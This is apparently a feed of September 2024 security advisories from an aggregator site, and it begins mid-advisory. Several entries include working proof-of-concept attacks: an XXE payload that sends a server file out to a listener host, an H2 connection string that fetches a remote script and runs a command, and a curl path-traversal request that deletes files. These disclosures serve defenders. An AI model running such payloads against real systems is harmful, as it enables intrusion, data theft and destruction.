User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn

------WebKitFormBoundary6OZBNygiUCAZEbMn
Content-Disposition: form-data; name="file"; filename="1.svg"
Content-Type: a

<?xml version='1.0'?>
<!DOCTYPE xxe [
<!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'>
%EvilDTD;
%LoadOOBEnt;
%OOB;
]>
------WebKitFormBoundary6OZBNygiUCAZEbMn--
```

Contents of 1.dtd:

```
<!ENTITY % resource SYSTEM "file:///etc/alpine-release">
<!ENTITY % LoadOOBEnt "<!ENTITY &#x25; OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>">
```

2. After sending the request, the content of the file /etc/alpine-release is successfully read:

```
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -
```

Affected versions: <= 2.10.0

### Patches

The vulnerability has been fixed in v2.10.1.

### Workarounds

It is recommended to upgrade the version to v2.10.1.

### References

If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4M9P-7XG6-F4MM
23.09.2024 23:27:12maven[MAVEN:GHSA-H7MJ-M72H-QM8W] DataEase's H2 datasource has a remote command execution risk (critical)

### Impact

An attacker can achieve remote command execution by adding a carefully constructed H2 data source connection string.

Request message:

```
POST /de2api/datasource/validate HTTP/1.1
Host: dataease.ubuntu20.vm
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-DE-TOKEN: jwt
Content-Length: 209
Content-Type: application/json

{
  "id": "",
  "name": "test",
  "type": "h2",
  "configuration": "eyJqZGJjIjogImpkYmM6aDI6bWVtOnRlc3Q7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO0lOSVQ9UlVOU0NSSVBUIEZST00gJ2h0dHA6Ly8xMC4xNjguMTc0LjE6ODAwMC9wb2Muc3FsJzsifQ=="
}
```

The `configuration` value is the base64 encoding of the H2 data source connection string:

```
// configuration
{
  "jdbc": "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.168.174.1:8000/poc.sql';",
}
```

The content of poc.sql:

```
// poc.sql
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';
CALL EXEC ('touch /tmp/jdbch2rce')
```

You can see that the file was created successfully in docker:

```
/tmp # ls -l jdbch2rce
-rw-r--r--    1 root     root             0 Sep 16 22:02 jdbch2rce
```

Affected versions: <= 2.10.0

### Patches

The vulnerability has been fixed in v2.10.1.

### Workarounds

It is recommended to upgrade the version to v2.10.1.

### References

If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/dataease
Email us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H7MJ-M72H-QM8W
23.09.2024 20:02:44ubuntu[USN-7021-2] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7021-2
23.09.2024 19:18:42ubuntu[USN-7029-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7029-1
23.09.2024 18:52:38ubuntu[USN-7007-3] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7007-3
23.09.2024 18:33:39ubuntu[USN-6999-2] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6999-2
23.09.2024 17:33:23suse[SUSE-SU-2024:3405-1] Security update for the Linux Kernel (Live Patch 6 for SLE 15 SP5) (important)Security update for the Linux Kernel (Live Patch 6 for SLE 15 SP5)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3405-1
23.09.2024 16:56:03suse[SUSE-SU-2024:3404-1] Security update for rage-encryption (moderate)Security update for rage-encryptionhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3404-1
23.09.2024 16:55:21suse[SUSE-SU-2024:3403-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3403-1
23.09.2024 16:33:33suse[SUSE-SU-2024:3399-1] Security update for the Linux Kernel (Live Patch 23 for SLE 15 SP4) (important)Security update for the Linux Kernel (Live Patch 23 for SLE 15 SP4)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3399-1
23.09.2024 16:04:42suse[SUSE-SU-2024:3398-1] Security update for the Linux Kernel (Live Patch 2 for SLE 15 SP6) (important)Security update for the Linux Kernel (Live Patch 2 for SLE 15 SP6)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3398-1
23.09.2024 15:04:11suse[SUSE-SU-2024:3396-1] Security update for qemu (important)Security update for qemuhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3396-1
23.09.2024 14:33:26suse[SUSE-SU-2024:3395-1] Security update for the Linux Kernel (Live Patch 20 for SLE 15 SP4) (important)Security update for the Linux Kernel (Live Patch 20 for SLE 15 SP4)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3395-1
23.09.2024 13:54:26ubuntu[USN-7028-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7028-1
23.09.2024 13:23:53ubuntu[USN-7020-2] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7020-2
24.09.2024 05:55:36rubysec[RUBYSEC:WEBRICK-2024-47220] HTTP Request Smuggling in ruby webrick (high)An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby. It allows HTTP request smuggling by providing both a Content-Length header and a Transfer-Encoding header, e.g., "GET /admin HTTP/1.1\r\n" inside of a "POST /user HTTP/1.1\r\n" request. NOTE: the supplier's position is "Webrick should not be used in production."https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:WEBRICK-2024-47220
23.09.2024 21:51:29rubysec[RUBYSEC:CAMALEON_CMS-7X4W-CJ9R-H4V9] Camaleon CMS vulnerable to remote code execution through code injection (GHSL-2024-185) (high)

The [actions](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L51-L52) defined inside of the MediaController class do not check whether a given path is inside a certain path (e.g. inside the media folder). If an attacker performed an account takeover of an administrator account (See: GHSL-2024-184) they could delete arbitrary files or folders on the server hosting Camaleon CMS. The [crop_url](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L64-L65) action might make arbitrary file writes (similar impact to GHSL-2024-182) for any authenticated user possible, but it doesn't seem to work currently.

Arbitrary file deletion can be exploited with the following code path:

The parameter folder flows from the actions method:

```ruby
def actions
  authorize! :manage, :media if params[:media_action] != 'crop_url'
  params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present?
  case params[:media_action]
  [..]
  when 'del_file'
    cama_uploader.delete_file(params[:folder].gsub('//', '/'))
    render plain: ''
```

into the method delete_file of the CamaleonCmsLocalUploader class (when files are uploaded locally):

```ruby
def delete_file(key)
  file = File.join(@root_folder, key)
  FileUtils.rm(file) if File.exist? file
  @instance.hooks_run('after_delete', key)
  get_media_collection.find_by_key(key).take.destroy
end
```

Where it is joined in an unchecked manner with the root folder and then deleted.

**Proof of concept**

The following request would delete the file README.md in the top folder of the Ruby on Rails application. (The values for auth_token, X-CSRF-Token and _cms_session would also need to be replaced with authenticated values in the curl command below.)

```
curl --path-as-is -i -s -k -X $'POST' \
  -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' -H $'Connection: keep-alive' \
  -b $'auth_token=[..]; _cms_session=[..]' \
  --data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=..2F..2F..2FREADME.md&media_action=del_file' \
  $'https://<camaleon-host>/admin/media/actions?actions=true'
```

**Impact**

This issue may lead to a defective CMS or system.

**Remediation**

Normalize all file paths constructed from untrusted user input before using them and check that the resulting path is inside the targeted directory. Additionally, do not allow character sequences such as .. in untrusted input that is used to build paths.

**See also:**

[CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)
[OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CAMALEON_CMS-7X4W-CJ9R-H4V9
23.09.2024 21:51:29rubysec[RUBYSEC:CAMALEON_CMS-R9CR-QMFW-PMRC] Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184) (medium)A stored cross-site scripting has been found in the image upload functionality that can be used by normal registered users: It is possible to upload a SVG image containing JavaScript and it's also possible to upload a HTML document when the format parameter is manually changed to [documents][1] or a string of an [unsupported format][2]. If an authenticated user or administrator visits that uploaded image or document malicious JavaScript can be executed on their behalf (e.g. changing or deleting content inside of the CMS.)

[1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106
[2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111

## Impact

This issue may lead to account takeover due to reflected Cross-site scripting (XSS).

## Remediation

Only allow the upload of safe files such as PNG, TXT and others or serve all "unsafe" files such as SVG and other files with a content-disposition: attachment header, which should prevent browsers from displaying them. Additionally, a [Content security policy (CSP)][3] can be created that disallows inlined script. (Other parts of the application might need modification to continue functioning.)

[3]: https://web.dev/articles/csp

To prevent the theft of the auth_token it could be marked with HttpOnly. This would however not prevent that actions could be performed as the authenticated user/administrator. Furthermore, it could make sense to use the authentication provided by Ruby on Rails, so that stolen tokens cannot be used anymore after some time.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CAMALEON_CMS-R9CR-QMFW-PMRC
24.09.2024 00:22:09pypi[PYSEC-2024-87] micropython-copy vulnerabilityA vulnerability was found in MicroPython 1.23.0. It has been rated as critical. Affected by this issue is the function mpz_as_bytes of the file py/objint.c. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 908ab1ceca15ee6fd0ef82ca4cba770a3ec41894. It is recommended to apply a patch to fix this issue. In micropython objint component, converting zero from int to bytes leads to heap buffer-overflow-write at mpz_as_bytes.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-87
24.09.2024 00:22:09pypi[PYSEC-2024-88] micropython-io vulnerabilityA vulnerability was found in MicroPython 1.23.0. It has been rated as critical. Affected by this issue is the function mpz_as_bytes of the file py/objint.c. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 908ab1ceca15ee6fd0ef82ca4cba770a3ec41894. It is recommended to apply a patch to fix this issue. In micropython objint component, converting zero from int to bytes leads to heap buffer-overflow-write at mpz_as_bytes.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-88
24.09.2024 00:22:09pypi[PYSEC-2024-89] micropython-os vulnerabilityA vulnerability was found in MicroPython 1.23.0. It has been rated as critical. Affected by this issue is the function mpz_as_bytes of the file py/objint.c. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 908ab1ceca15ee6fd0ef82ca4cba770a3ec41894. It is recommended to apply a patch to fix this issue. In micropython objint component, converting zero from int to bytes leads to heap buffer-overflow-write at mpz_as_bytes.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-89
25.09.2024 11:27:37ubuntu[USN-7009-2] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7009-2
25.09.2024 04:16:33ubuntu[USN-7033-1] Intel Microcode vulnerabilitiesSeveral security issues were fixed in Intel Microcode.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7033-1
24.09.2024 23:19:41ubuntu[USN-7032-1] Tomcat vulnerabilityTomcat could allow unintended access to network services.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7032-1
24.09.2024 21:34:44maven[MAVEN:GHSA-2RMJ-MQ67-H97G] Spring Framework DoS via conditional HTTP request (moderate)
### Description
Applications that parse ETags from `If-Match` or `If-None-Match` request headers are vulnerable to DoS attack.
### Affected Spring Products and Versions
org.springframework:spring-web in versions
- 6.1.0 through 6.1.11
- 6.0.0 through 6.0.22
- 5.3.0 through 5.3.37
Older, unsupported versions are also affected
### Mitigation
Users of affected versions should upgrade to the corresponding fixed version.
- 6.1.x -> 6.1.12
- 6.0.x -> 6.0.23
- 5.3.x -> 5.3.38
No other mitigation steps are necessary.
Users of older, unsupported versions could enforce a size limit on `If-Match` and `If-None-Match` headers, e.g. through a Filter.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2RMJ-MQ67-H97G
24.09.2024 19:46:51suse[SUSE-SU-2024:3430-1] Security update for python36 (important)Security update for python36https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3430-1
24.09.2024 19:46:34suse[SUSE-SU-2024:3429-1] Security update for apr (moderate)Security update for aprhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3429-1
24.09.2024 19:46:17suse[SUSE-SU-2024:3428-1] Security update for apr (moderate)Security update for aprhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3428-1
24.09.2024 19:42:50suse[SUSE-SU-2024:3427-1] Security update for python311 (important)Security update for python311https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3427-1
24.09.2024 19:42:36suse[SUSE-SU-2024:3426-1] Security update for quagga (important)Security update for quaggahttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3426-1
24.09.2024 19:33:32suse[SUSE-SU-2024:3425-1] Security update for the Linux Kernel (Live Patch 18 for SLE 15 SP4) (important)Security update for the Linux Kernel (Live Patch 18 for SLE 15 SP4)https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3425-1
24.09.2024 18:25:51suse[SUSE-SU-2024:3424-1] Security update for xen (moderate)Security update for xenhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3424-1
24.09.2024 18:25:42suse[SUSE-SU-2024:3423-1] Security update for xen (important)Security update for xenhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3423-1
24.09.2024 18:25:24suse[SUSE-SU-2024:3422-1] Security update for xen (moderate)Security update for xenhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3422-1
24.09.2024 18:25:08suse[SUSE-SU-2024:3421-1] Security update for xen (moderate)Security update for xenhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3421-1
24.09.2024 18:04:39ubuntu[USN-7031-2] Puma vulnerabilityPuma could be made to overwrite headers if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7031-2
24.09.2024 16:38:59suse[SUSE-SU-2024:3418-1] Security update for python311 (important)Security update for python311https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3418-1
24.09.2024 16:16:23ubuntu[USN-7031-1] Puma vulnerabilityPuma could be made to overwrite headers if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7031-1
24.09.2024 13:46:00xen[XSA-462] x86: Deadlock in vlapic_error()
**ISSUE DESCRIPTION**
In x86's APIC (Advanced Programmable Interrupt Controller) architecture, error conditions are reported in a status register. Furthermore, the OS can opt to receive an interrupt when a new error occurs.
It is possible to configure the error interrupt with an illegal vector, which generates an error when an error interrupt is raised.
This case causes Xen to recurse through vlapic_error(). The recursion itself is bounded; errors accumulate in the status register and only generate an interrupt when a new status bit becomes set.
However, the lock protecting this state in Xen will try to be taken recursively, and deadlock.
**IMPACT**
A buggy or malicious HVM or PVH guest can deadlock Xen, leading to a DoS.
**VULNERABLE SYSTEMS**
Xen 4.5 and onwards are vulnerable. Xen 4.4 and older are not vulnerable.
Only x86 systems running HVM or PVH guests are vulnerable. Architectures other than x86 are not vulnerable.
Only HVM or PVH guests can leverage the vulnerability. PV guests cannot leverage the vulnerability.
https://secdb.nttzen.cloud/security-advisory/xen/XSA-462
25.09.2024 09:23:55pypi[PYSEC-2024-91] micropython-copy vulnerabilityA vulnerability was found in MicroPython 1.23.0. It has been classified as critical. Affected is the function mp_vfs_umount of the file extmod/vfs.c of the component VFS Unmount Handler. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 29943546343c92334e8518695a11fc0e2ceea68b. It is recommended to apply a patch to fix this issue. In the VFS unmount process, the comparison between the mounted path string and the unmount requested string is based solely on the length of the unmount string, which can lead to a heap buffer overflow read.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-91
25.09.2024 09:23:55pypi[PYSEC-2024-92] micropython-copy vulnerabilityA vulnerability was found in MicroPython 1.22.2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file py/objarray.c. The manipulation leads to use after free. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 1.23.0 is able to address this issue. The identifier of the patch is 4bed614e707c0644c06e117f848fa12605c711cd. It is recommended to upgrade the affected component. In micropython objarray component, when a bytes object is resized and copied into itself, it may reference memory that has already been freed.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-92
25.09.2024 09:23:55pypi[PYSEC-2024-93] micropython-io vulnerabilityA vulnerability was found in MicroPython 1.23.0. It has been classified as critical. Affected is the function mp_vfs_umount of the file extmod/vfs.c of the component VFS Unmount Handler. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 29943546343c92334e8518695a11fc0e2ceea68b. It is recommended to apply a patch to fix this issue. In the VFS unmount process, the comparison between the mounted path string and the unmount requested string is based solely on the length of the unmount string, which can lead to a heap buffer overflow read.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-93
25.09.2024 09:23:55pypi[PYSEC-2024-94] micropython-io vulnerabilityA vulnerability was found in MicroPython 1.22.2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file py/objarray.c. The manipulation leads to use after free. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 1.23.0 is able to address this issue. The identifier of the patch is 4bed614e707c0644c06e117f848fa12605c711cd. It is recommended to upgrade the affected component. In micropython objarray component, when a bytes object is resized and copied into itself, it may reference memory that has already been freed.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-94
25.09.2024 09:23:56pypi[PYSEC-2024-95] micropython-os-path vulnerabilityA vulnerability was found in MicroPython 1.23.0. It has been classified as critical. Affected is the function mp_vfs_umount of the file extmod/vfs.c of the component VFS Unmount Handler. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 29943546343c92334e8518695a11fc0e2ceea68b. It is recommended to apply a patch to fix this issue. In the VFS unmount process, the comparison between the mounted path string and the unmount requested string is based solely on the length of the unmount string, which can lead to a heap buffer overflow read.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-95
25.09.2024 09:23:56pypi[PYSEC-2024-96] micropython-string vulnerabilityA vulnerability was found in MicroPython 1.23.0. It has been classified as critical. Affected is the function mp_vfs_umount of the file extmod/vfs.c of the component VFS Unmount Handler. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 29943546343c92334e8518695a11fc0e2ceea68b. It is recommended to apply a patch to fix this issue. In the VFS unmount process, the comparison between the mounted path string and the unmount requested string is based solely on the length of the unmount string, which can lead to a heap buffer overflow read.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-96
26.09.2024 12:55:30ubuntu[USN-7003-4] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7003-4
26.09.2024 12:53:22ubuntu[USN-7034-2] ca-certificates updateThe CA certificates in the ca-certificates package were updated.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7034-2
26.09.2024 12:09:02ubuntu[USN-7038-1] APR vulnerabilityThe system could be made to expose sensitive information.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7038-1
26.09.2024 09:38:27ubuntu[USN-7037-1] OpenJPEG vulnerabilityOpenJPEG could be made to crash if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7037-1
26.09.2024 07:19:46ubuntu[USN-7036-1] Rack vulnerabilitiesSeveral security issues were fixed in Rack.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7036-1
26.09.2024 03:19:01fedora[FEDORA-2024-6b9aeecbe8] Fedora 41: chisel (high)Update to new upstream version (closes rhbz#2303131)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6b9aeecbe8
26.09.2024 01:21:37ubuntu[USN-7035-1] AppArmor vulnerabilityAppArmor restrictions could be bypassed for rules allowing mount operations.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7035-1
26.09.2024 01:13:22npm[NPM:GHSA-VRCX-GX3G-J3H8] Heap-based Buffer Overflow in sqlite-vec (critical)sqlite-vec v0.1.1 was discovered to contain a heap buffer overflow via the npy_token_next function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VRCX-GX3G-J3H8
25.09.2024 21:13:36npm[NPM:GHSA-RGG8-G5X8-WR9V] Cross-site scripting (XSS) in the clipboard package (moderate)
### Impact
During a recent internal audit, a Cross-Site Scripting (XSS) vulnerability was identified in the CKEditor 5 clipboard package. This vulnerability could be triggered by a specific user action, leading to unauthorized JavaScript code execution, if the attacker managed to insert a malicious content into the editor, which might happen with a very specific editor configuration.
This vulnerability affects **only** installations where the editor configuration meets the following criteria:
1. The [**Block Toolbar**](https://ckeditor.com/docs/ckeditor5/latest/getting-started/setup/toolbar.html#block-toolbar) plugin is enabled.
1. One of the following plugins is also enabled:
   - [**General HTML Support**](https://ckeditor.com/docs/ckeditor5/latest/features/html/general-html-support.html) with a configuration that permits unsafe markup.
   - [**HTML Embed**](https://ckeditor.com/docs/ckeditor5/latest/features/html/html-embed.html).
### Patches
The problem has been recognized and patched. The fix will be available in version 43.1.1.
### Workarounds
It's highly recommended to update to the version 43.1.1. However, if the update is not an option, we recommend disabling the block toolbar plugin.
### For more information
Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RGG8-G5X8-WR9V
25.09.2024 19:32:15ubuntu[USN-7034-1] ca-certificates updateThe CA certificates in the ca-certificates package were updated.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7034-1
25.09.2024 19:11:35suse[SUSE-SU-2024:3445-1] Security update for opensc (low)Security update for openschttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3445-1
25.09.2024 19:11:12suse[SUSE-SU-2024:3444-1] Security update for opensc (low)Security update for openschttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3444-1
25.09.2024 19:11:01suse[SUSE-SU-2024:3443-1] Security update for opensc (low)Security update for openschttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3443-1
25.09.2024 19:00:00cisco[CISCO-SA-WEBUI-CSRF-YCUYXKKO] Cisco IOS XE Software Web UI Cross-Site Request Forgery Vulnerability (high)A vulnerability in the web-based management interface of Cisco IOS XE Software could allow an unauthenticated, remote attacker to perform a cross-site request forgery (CSRF) attack and execute commands on the CLI of an affected device. This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading an already authenticated user to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the affected device with the privileges of the targeted user. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-WEBUI-CSRF-YCUYXKKO
25.09.2024 19:00:00cisco[CISCO-SA-VLAN-DOS-27PUR5RT] Cisco Catalyst 9000 Series Switches Denial of Service Vulnerability (medium)A vulnerability in Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on the control plane of an affected device. This vulnerability is due to improper handling of frames with VLAN tag information. An attacker could exploit this vulnerability by sending crafted frames to an affected device. A successful exploit could allow the attacker to render the control plane of the affected device unresponsive. The device would not be accessible through the console or CLI, and it would not respond to ping requests, SNMP requests, or requests from other control plane protocols. Traffic that is traversing the device through the data plane is not affected. A reload of the device is required to restore control plane services. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-VLAN-DOS-27PUR5RT
25.09.2024 19:00:00cisco[CISCO-SA-UTD-SNORT3-DOS-BYPAS-B4OUEWXD] Cisco Unified Threat Defense Snort Intrusion Prevention System Engine for Cisco IOS XE Software Security Policy Bypass and Denial of Service Vulnerability (medium)A vulnerability in Cisco Unified Threat Defense (UTD) Snort Intrusion Prevention System (IPS) Engine for Cisco IOS XE Software could allow an unauthenticated, remote attacker to bypass configured security policies or cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient validation of HTTP requests when they are processed by Cisco UTD Snort IPS Engine. An attacker could exploit this vulnerability by sending a crafted HTTP request through an affected device. A successful exploit could allow the attacker to trigger a reload of the Snort process. If the action in case of Cisco UTD Snort IPS Engine failure is set to the default, fail-open, successful exploitation of this vulnerability could allow the attacker to bypass configured security policies. If the action in case of Cisco UTD Snort IPS Engine failure is set to fail-close, successful exploitation of this vulnerability could cause traffic that is configured to be inspected by Cisco UTD Snort IPS Engine to be dropped. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-UTD-SNORT3-DOS-BYPAS-B4OUEWXD
25.09.2024 19:00:00cisco[CISCO-SA-SDWAN-XSS-ZQ4KPVYD] Cisco Catalyst SD-WAN Manager Cross-Site Scripting Vulnerability (medium)A vulnerability in the web-based management interface of Cisco Catalyst SD-WAN Manager, formerly Cisco SD-WAN vManage, could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by inserting malicious data into a specific data field in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SDWAN-XSS-ZQ4KPVYD
25.09.2024 19:00:00cisco[CISCO-SA-SDWAN-UTD-DOS-HDATQXS] Cisco Catalyst SD-WAN Routers Denial of Service Vulnerability (high)A vulnerability in the process that classifies traffic that is going to the Unified Threat Defense (UTD) component of Cisco IOS XE Software in controller mode could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability exists because UTD improperly handles certain packets as those packets egress an SD-WAN IPsec tunnel. An attacker could exploit this vulnerability by sending crafted traffic through an SD-WAN IPsec tunnel that is configured on an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition. Note: SD-WAN tunnels that are configured with Generic Routing Encapsulation (GRE) are not affected by this vulnerability. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75169"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SDWAN-UTD-DOS-HDATQXS
